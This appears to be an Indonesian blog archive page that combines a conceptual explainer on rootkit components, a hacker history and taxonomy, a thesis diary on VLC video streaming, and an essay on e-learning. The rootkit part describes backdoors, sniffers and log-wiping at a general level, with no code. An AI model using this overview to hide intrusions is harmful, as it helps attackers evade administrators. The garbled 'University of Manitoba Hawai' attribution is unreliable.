Rootkit terdiri atas gabungan 2 kata, yaitu root dan kit. Root adalah hak akses tertinggi dalam system operasi keluarga unix dan kit merupakan kumpulan dari tools. Jadi rootkit bisa diartikan sebagai tools atau kumpulan tools yang digunakan untuk menguasai suatu system secara permanent tanpa diketahui oleh administrator dari mesin yang telah dikuasai.

Rootkit haruslah mempunyai kemampuan untuk menyembunyikan kehadirannya dan juga mempunyai kemampuan untuk tetap menguasai system tanpa diketahui oleh admin bersangkutan. Rootkit biasanya akan masuk kedalam arsitektur dari suatu system sehingga tidak terdeteksi, maka dari itu program backdoor seperti BO dan Netbus tidak bisa dikategorikan sebagai Rootkit.

Rootkit biasanya terdiri atas beberapa tools, seperti :

* Program Backdoor
Merupakan program yang digunakan agar system bisa tetap dikuasai dan tetap bisa di akses tanpa perlu lagi melalui exploit. Dengan begitu walaupun kelemahan system telah diperbaiki atau exploit tidak berlaku lagi, penyerang tetap mampu menguasai system melalui backdoor ini.
Program backdoor ini biasanya akan memodifikasi atau mengganti program seperti login.c, ftp, rlogin, inetd, dll sehingga memungkinkan penyerang mendapatkan hak akses melalui service yang telah termodifikasi tersebut. Penempatan backdoor bahkan dilakukan juga melalui modifikasi kernel susah untuk di deteksi kerbeadaannya.

* Packet Sniffer
Sniffer yang merupakan program yang digunakan untuk mengcapture informasi yang dilewatkan dari kabel jaringan. Program seperti ftp dan telnet biasanya dalam mengirimkan informasi username dan password dalam text yang tidak terenkripsi sehingga mudah untuk di curi.

* Pengontrol Log File
Program yang di ikut sertakan dan cukup penting dalam Rootkit adalah program untuk menghapus log. Dengan tools ini semua aktifitas dari penyerang bisa disembunyikan sehingga sang admin tidak menyadari aktifitas yang terjadi oleh pihak yang tidak diinginkan. Dengan adanya tools ini membuat sang admin akan kesulitan dalam mendeteksi keberadaan pihak yang tidak diinginkan ini. Biasanya untuk log file juga disertakan program untuk melakukan edit terhadap log file.

* Tools Lainnya
Adalah tools tambahan yang digunakan oleh penyerang seperti program Ddos client, yaitu trinoo, IRC bot yang akan melakukan koneksi secara otomatis ke pada server di IRC secara otomatis, dll.

* System Patch
Setelah mendapatkan akses kepada melalui vulnerability, rootkit juga menyediakan tools untuk melakukan patch terhadap kelemahan tersebut dengan tujuan agar hacker lain tidak akan masuk ke system tersebut. Karena penyerang telah membuat backdoor, system yang telah dikuasai tetap akan dalam kontrol sang penyerang dengan rootkit.


RootKit bisa dibedakan menjadi 2, yaitu :
* Application RootKit
* Kernel RootKit

Sejarah tentang Hack, Hacker, dan Hacking

Sebelum terbentuknya komunikasi yang tercipta di Internet, pada tahun 1960-an beberapa mahasiswa ilmu komputer di Massachusetts Institute of Technology (MIT) yang gemar untuk melakukan engineering dan re-engineering terhadap perangkat keras dan perangkat lunak sering melakukan diskusi-diskusi terbuka yang disana membahas masalah :

* Ide-ide mengenai pengembangan perangkat keras dan perangkat lunak
* Ide-ide mengenai transformasi terhadap teknologi dan informasi

Pengistilahan dan perkataan “Hack” sebenarnya adalah merupakan slang yang pada saat itu belum memiliki arti yang spesifik dan sebenarnya. Kebiasaan-kebiasaan mengucapkan “I Hack This Stuff” seakan-akan memberikan arti bahwa istilah Hack merupakan kegiatan yang sedang dan memperoleh hasil setelah melakukan pengembangan terhadap segala sesuatu yang dilakukan. Pengembangan-pengembangan yang secara khusus diberikan kepada minicomputer dan microcomputer tersebutlah istilah “Computer Hacker” terbentuk.

Dengan kata lain, Computer Hacker adalah seseorang yang mengaplikasikan kemampuan dalam cakupannya mengenai komputer software, komputer hardware, komputer arsitektur, komputer desain, serta administrasi yang terkandung didalamnya. Seorang Hacker dituntut memiliki kemampuan dalam hal pemrograman untuk tingkatan software, dan keahlian dibidang hardware. Tuntutan yang sedemikian luasnya untuk keamanan disisi sistem aplikasi dan jaringan, memberikan motivasi bagi seorang Hacker untuk mengembangkan keahlian tersebut sehingga hasil dari penelitian yang dilakukan akan memberikan dampak yang positif bagi kelangsungan IT itu sendiri.

Dengan melihat sekelumit penjelasan diatas, kita dapat memberikan kesimpulan bahwa Hacking bukanlah sebatas pada kegiatan illegal yang identik dengan pengrusakan sebuah sistem dan aplikasi, atau sebatas kegiatan-kegiatan tentang pencurian sebuah data-data penting, melainkan kepada tindakan untuk melakukan perubahan yang mendasar atau perbaikan-perbaikan terhadap sistem dan aplikasi, baik yang berupa software ataupun hardware.

KELOMPOK HACKER BERDASARKAN MOTIF

* Black Hat Para hacker yang menjelma menjadi cracker / attacker yang menggunakan kemampuannya untuk tujuan kriminal dan cenderung membahayakan kepentingan pihak lain. Pada umumnya orang-orang yang tergabung dalam kelompok ini adalah yang bergerak secara individu atau sesuai idealisme tertentu dan tidak terikat atas kepentingan pihak tertentu.
* Grey Hat Para hacker yang memberikan informasi yang diperoleh ke para attacker maupun para vendor, untuk memperoleh imbalan tertentu. Kelompok ini dikenal juga sebagai cracker, yakni orang-orang yang tidak memiliki keberpihakan pada pihak manapun dan menjual berbagai informasi yang diperlukan sesuai kebutuhan yang ada.
* White Hat (hacker sejati) Orang-orang yang melakukan aktivitas hacking dalam rangka memperoleh informasi tentang celah-celah keamanan, maupun kelemahan-kelemahan yang dimiliki untuk diberikan kembali kepada pihak yang bersangkutan untuk disempurnakan kembali.
* Blue Hat yang punya kemampuan seperti white hat, tapi berkecimpung di dunia pendidikan.

TUJUH KELOMPOK HACKER BERDASARKAN PROFILE KEMAMPUAN

Pembagian para hacker berdasarkan profile kemampuan profesionalnya terbagi menjadi tujuh kelompok. Hal ini sebagaimana dijelaskan oleh Marc Rogers MA, seorang guru besar psikologi dari University of Manitoba Hawai, yakni:

* Tool Kids/NewBies Orang-orang yang baru belajar aktivitas hacking, namun kemampuan kemampuan tentang komputer serta teknik pemrograman relatif terbatas dan hanya baru bisa membuat program-program dasar. Aktivitas hacking yang dilakukan, umumnya menggunakan bantuan aplikasi yang terdapat di internet hingga tidak murni mengandalkan kemampuan individunya.
* Cyber Punk Orang-orang yang memiliki pengetahuan dan teknik komputer yang lebih tinggi dibandingkan NewBies. Mereka sudah mampu memahami karakteristik dari sistem jaringan ataupun sistem yang sedang mereka serang. Pengetahuan mereka tentang bahasa pemrograman cukup andal, karena mampu mendefinisikan hingga karakteristik umumnya. Dengan kemampuannya ini, ia sudah mampu menciptakan alat bantu infiltrasi sendiri, hingga tidak lagi menggunakan program-program bantu yang tersedia di internet. Aktivitas-aktivitas yang dilakukan memiliki kecenderungan untuk kriminal, seperti defacing web, carding, ataupun spamming.
* Internals Orang-orang yang masih bergabung ataupun pernah (mantan) dengan perusahaan TI, dengan kemampuan komputer dan programming yang anda. Dan melakukan berbagai aktivitas hacking dengan mengandalkan berbagai kombinasi sumber daya internal maupun eksternal yang ada untuk berbagai tujuan. Contoh, pelanggaran paling sering dilakukan adalah breaking over priviledge activity, yakni segala aktivitas yang melanggar batasan-batasan hak yang dimiliki.
* Coders Golongan ini dikenal juga sebagai resources, yakni orang-orang yang menjual berbagai informasi yang ada di internet ke pihak-pihak yang membutuhkan. Kemampuan programming dan teknisnya sangat andal dan kelompok ini malakukan berbagai aktivitas infiltrasi dalam rangka untuk memperoleh berbagai data ataupun informasi yang dapat dijual. Coders juga membantu membuat berbagai aplikasi bantu hacking yang dibutuhkan oleh para hacker ataupun attacker/cracker yang membutuhkan.
* Old Guard Hackers (Idealism Gate Keepers) Para hacker sejati yang murni melakukan aktivitas-kativitas hacking dalam rangka untuk tujuan ilmiah dan kebaikan semua pihak. Jumlah golongan ini relatif sangat sedikit, karena idealisme yang dijunjung memaksa mereka untuk menggunakan kode etik yang dijunjung tinggi oleh para hacker, yakni kemampuan di atas segalanya.
* Professional Criminals Para attacker/cracker yang bergerak atas nama kelompok ataupun individu dan melakukan berbagai aktivitas cyber crime sebagai sumber kehidupan utamanya. Kemampuan yang dimiliki oleh kelompok ini sangat sempurna karena mengombinasikan berbagai piranti keras dan pengetahuan programming yang bisa diandalkan dibantu data/informasi yang diperoleh dari Coders. Aktivitas kejahatan yang dilakukan tidak lagi dalam kelas cyber punk yang lebih banyak pada target individu, namun justru pada kalangan korporat dengan jalan merampok dana yang tersedia dengan melakukan transfer secara tersembunyi.
* Cyber Terrorist Sekelompok orang atau individu yang bertindak atas dasar sentimen pada suatu kelompok atau pihak tertentu, dan melakukan berbagai aktivitas yang bertujuan untuk menunjukkan eksistensi mereka pada lingkungan dunia. Tingkatan kemampuan yang dimiliki kelompok ini adalah yang tertinggi karena menggabungkan berbagai sumber daya yang ada, level kemampuan, bahkan menggunakan sarana prasarana bantuan dari pihak sponsor yang membantu seperti satelit komunikasi.

Apapun alasannya ‘hacking’ adalah tindakan yang tidak melangar hukum, namun disebut “cracking” apabila digunakan untuk merusak, menghilangkan data / sesuatu yang bukan milik kita. Akan tetapi yang kita ketahui bersama – sama bahwa tidak adanya jaminan yang memastikan data atau informasi yang kita punya adalah 100 % aman dan kondisi inilah yang digunakan orang untuk memulai “pekerjaan” merusak dari awalnya iseng hingga professional. Hal terpenting yang bisa kita lakukan adalah menutup segala kemungkinan celah keamanan yang terbuka dan selalu mengupdate data / informasi [ siaga ].

Jumat, 25 Juni 2010

Eksplorasi Streaming Video dengan VideoLAN Client (VLC)

Beberapa bulan ini saya disibukkan dengan tugas akhir, yang harus saya selesaikan dua bulan lagi. Kebetulan tugas akhir saya mengambil judul “Layanan Televisi Berbasis Protokol Internet“. Dalam tugas akhir tersebut saya melakukan pembuatan antarmuka video streaming berbasis web (bernama WebTV) dan melakukan analisa terhadap jenis kompresi. Oh ya, aplikasi yang saya gunakan untuk menyelenggarakan layanan video streaming adalah aplikasi opensource bernama VideoLAN. Jenis layanan video streaming yang saya teliti ada dua, yakni Video on Demand (VOD) dan Live Broadcast.

Di MTI UGM terdapat 4 kali pra pendadaran dan satu kali pendadaran. Pada pra pendadaran pertama, saya diharuskan memaparkan rencana penelitian. Kemudian pada pra pendadaran kedua mahasiswa diharuskan memaparkan desain dan pemodelan terhadap sistem yang akan dibuat. Setelah itu, pada pra pendadaran ketiga saya diharuskan mendemokan/menunjukkan hasil akhir sistem yang sudah saya buat. Selanjutnya pada pra ke-empat kita diharuskan memaparkan hasil analisa.

PixelView PlayTV Pro 2Dari pra kedua kemarin terdapat catatan dari dosen pembimbing dan penguji, dimana saya harus dapat mendemokan live streaming via capture device seperti webcam, tv-tuner atau camcorder pada aplikasi (Web-TV) yang saya buat. Sebelumnya saya telah berhasil melakukan streaming dengan file video, tetapi berkali-kali mencoba streaming menggunakan capture device selalu gagal. Pertama kali saya mencoba dengan webcam yang ada pada laptop saya, kemudian yang kedua, saya mencoba dengan TV-Tuner PixelView PlayTV Pro 2 produksi Prolink, tetapi hasilnya nol.

TV-Tuner ini menggunakan chipset Bt9878 (bener gak sih? :) ), saya coba konfigurasi berkali-kali tapi hasilnya nihil, gambar pun tidak muncul sama sekali di VideoLAN (VLC). Lalu saya mencoba menukarkan TV-Tuner tersebut ke penjualnya (untungnya sang penjual adalah teman, jadi bisa tukar) dengan TV-Tuner eksternal untuk notebook (mereknya GADMEI). TV-Tuner eksternal ini untuk berhubungan dengan desktop atau notebook menggunakan interface USB 2.0. Untuk chipsetnya aku belum teliti lebih lanjut. Sungguh amazing!!! ketika aku coba konfigurasi VLC-nya, yaitu mencoba streaming dengan capture device, lalu mengeset Stream Out nya ke UDP dengan IP Multicast 239.255.10.40 aplikasi VLC dapat menampilkan gambar meskipun seperti semut :) . Kebetulan TV-Tuner eksternal tersebut menyertakan port composite atau A/V sehingga saya penasaran ingin mencoba memasukkan sumber inputan dari luar ke TV-Tuner tersebut.

GADMEI USB TV-BOXLalu saya ambil VCD Player dan menancapkannya pada port A/V. Benar saja, VLC dapat menampilkan gambar video dan menstream siaran lewat jaringan, video pun dapat terlihat di aplikasi WebTV. Saya jadi berkesimpulan bahwa VLC tidaklah mendukung semua chipset TV-Tuner. Apabila Anda menghadapi kasus yang sama dengan saya, dan untuk mempermudah urusan Anda, saya sarankan untuk menggunakan GADMEI USB TV BOX UTV330

TV-Tuner eksternal tersebut dipasarkan sekitar 350.000 rupiah. Aslinya ditujukan untuk penggunaan pada Laptop (yang jual sih bilangnya gitu), tapi yang penting kan punya interface USB 2.0, jadi digunakan di desktop maupun di laptop ya ngga masalah tho ya…

Setelah pra pendadaran ketiga besok saya akan menceritakan lagi hasil penelitian saya. Saya juga masih ingin bercerita panjang lebar tentang aplikasi WebTV yang saya buat. Semoga pra ketiga besok sistem yang saya demokan bisa berjalan tanpa kendala. (***Bersambung***)

Alasan Mengapa Pengajar Menjauhi E-Learning

Tulisan ini sebenarnya merupakan curhat saya sebagai praktisi e-Learning sekaligus sebagai fasiliator dalam beberapa kelas online. Menjadi fasilitator online memang tidak segampang yang dibayangkan. Orang mungkin berfikir bahwa teknologi akan meringankan pekerjaan kita. Tetapi kenyataan berkata lain, pemanfaatan teknologi informasi dalam mendukung penyelenggaraan kelas jauh justru tidak akan meringankan pekerjaan Anda sebagai fasilitator. Lho kok bisa? Pasti Anda akan bertanya seperti itu :) .

Sebagai fakta, ketika saya melakukan fasilitasi jarak jauh dengan para peserta, misalnya dalam pengerjaan tugas proyek misalnya, atau berdiskusi tentang sebuah topik diskusi di dalam forum diskusi, maka kita harus mengeluarkan effort lebih untuk menanggapi setiap pertanyaan yang ada. Dan jawabannya pun harus disesuaikan dengan konteks permasalahan pribadi peserta masing-masing, jadi lebih bersifat personal dan kita tidak bisa melakukan generalisasi, karena hasilnya tentu saja akan berbeda untuk setiap individunya. Biasanya, para peserta kursus yang memiliki motivasi tinggi akan berusaha menggali informasi lebih banyak dari fasilitator.

Saya sendiri merasakan, di hari-hari kerja, handphone saya akan selalu berbunyi, entah telepon atau SMS. Ternyata banyak dari peserta didik yang menanyakan tugas, menanyakan solusi bagaimana melakukan hal ini dan itu, serta memberikan konfirmasi bahwa mereka tidak dapat menyelesaikan tugas tepat wakti karena kesibukan yang tidak bisa ditinggalnkan (maklum saja, peserta kursus jarak jauh saya kesemuanya adalah dosen yang punya tanggung jawab mengajar pula).

Disamping itu dalam ruang kelas online, mereka harus pula menyediakan bahan ajar yang lengkap di setiap sesinya. Dan memberikan kesempatan kepada peserta didik untuk belajar lebih cepat daripada pembelajaran di dalam kelas tatap mukanya. Selain itu, mereka juga dituntut untuk mengembangkan berbagai media ajar non cetak, jadi tidak hanya e-book dalam format PDF atau file presentasi saja yang mereka sajikan, namun lebih dari itu, mereka harus pula menyajikan bahan ajar multimedia lainnya sepeti video atau animasi interaktif.

Namun demikian, jika kita berfikir tentang kualitas hasil belajar maka hal seperti ini sebenarnya merupakan pertanda baik dimana kita dapat memberikan sentuhan dan dukungan yang lebih banyak kepada mereka untuk sukses mengikuti pembelajaran yang ada, untuk mencapai tujuan utama pembelajaran. Namun akan sangat berbeda jika ini dilihat dari pandangan dosen/pengajar yang tidak memiliki wawasan maju, malas, tidak siap secara materi dan terlalu sibuk. Mereka akan menganggap hal seperti ini akan merepotkan mereka, menambah pekerjaan dan sebagainya.

Dari ungkapan diatas, jelas sudah bahwa e-Learning sebenarnya hanya cocok bagi dosen-dosen berwawasan maju, berpandangan luas, memiliki kepedulian terhadap kualitas lulusan mereka, dan ingin memberikan layanan terbaik pada setiap pembelajaran yang mereka ampu. Tulisan ini bukan bermaksud menakut-nakuti mereka yang akan melaksanakan e-Learning di institusinya, namun lebih jauh dari itu, tulisan ini sebenarnya lebih kepada mengajak para dosen/pengakar untuk merubah paradigma mereka terlebih dahulu sebelum dapat menjadi fasilitator pembelajaran jarak jauh yang handal.

Tag:distance education, distance learning, eLearning, ict, tik